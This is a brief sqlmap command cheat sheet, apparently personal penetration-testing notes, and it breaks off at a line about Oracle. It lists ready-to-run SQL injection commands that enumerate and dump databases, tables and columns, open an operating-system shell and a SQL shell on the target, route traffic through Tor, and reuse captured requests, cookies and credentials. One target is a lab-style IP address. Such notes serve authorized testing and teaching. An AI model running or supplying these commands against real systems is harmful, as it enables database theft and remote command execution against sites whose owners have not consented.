--batch # Use default config, make the injection process run automatically, without user input.
--threads 5
-r # uses the intercepted request you saved earlier like burp save the item
sqlmap -r save.item
sqlmap --dbms=mysql -u "$URL" --dbs # optional param --forms
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" -C "$COLUMN" --dump
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --columns
sqlmap --dbms=mysql -u "http://www.example.com/param1=value1¶m2=value2" --dbs -p param2
sqlmap --dbms=mysql -u "http://example.domain/param1/value1*/param2/value2" --dbs # exploits param1
sqlmap -u "http://example.domain/" --data='param1=blah¶m2=blah' --cookie='JSESSIONID=d02084cbe50e16aa4' --level=5 --risk=3 -p param1
sqlmap -u http://10.10.10.73/login.php --dbms=MySQL --method=POST --data="username=x&password=y" --random-agent --risk=3 --level=5 -p username --text-only --string "Wrong identification : admin"
--text-only
is optional
sqlmap --dbms=mysql -u "$URL" --os-shell
sqlmap --dbms=mysql -u "$URL" --sql-shell
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"
sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs
sqlmap -u "http://example.domain/" -s-data=param1=value1¶m2=value2 -p param1 --auth-type=[basic/ntlm] --auth-cred=username:password
sqlmap -u "http://example.domain/" --proxy=http://proxy_address:port
If the DM is Oracle, check below